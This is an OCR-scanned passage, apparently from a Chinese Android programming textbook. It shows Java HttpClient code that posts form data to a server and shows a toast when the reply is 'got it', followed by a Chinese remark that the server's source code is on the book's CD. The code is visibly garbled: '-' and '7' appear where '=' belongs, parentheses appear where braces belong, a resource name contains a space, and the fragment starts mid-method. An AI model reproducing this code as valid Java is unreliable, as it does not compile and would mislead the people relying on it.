UrlEncodedFormEntity formEntity = new UrlEncodedFormEntity(postParameters); 
request.setEntity(formEntity); 
HttpResponse response - client.execute(request); 


HttpEntity value = response.getEntity(); 
InputStream is = value.getContent(); 


BufferedReader reader = new BufferedReader(new InputStreamReader(is, "iso-8859-1"), 8); 


String line = reader.readLine(); 
if(line.equals("got it"))( 
Toast.makeText(context, R.string.video received, 1000).show(); 
} 
} finally { 
if (in != null) ( 
try { 
in.close(); 
} catch (IOException e) { 
e.printStackTrace(); 
} 
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private static HttpClient getHttpClient() ( 
if (mHttpClient == null) ( 
mHttpClient = new DefaultHttpClient(); 
final HttpParams params 7 mHttpClient.getParams(); 
HttpConnectionParams.setConnectionTimeout(params, 0); 
HttpConnectionParams.setSoTimeout(params, 0); 
ConnManagerParams.setTimeout(params, 0); 
} 
return mHttpClient; 
} 


} 
远程 服务 器 网 站 是 基于 ISP 技术 开发 的 Java Web 站 点 。 具 体 源 代码 在 本 书 附 带 光盘 中 ， 因 为 这 部 分 不 
是 本 书 的 重点 ， 所 以 请 读者 自行 阅读 理解 。 


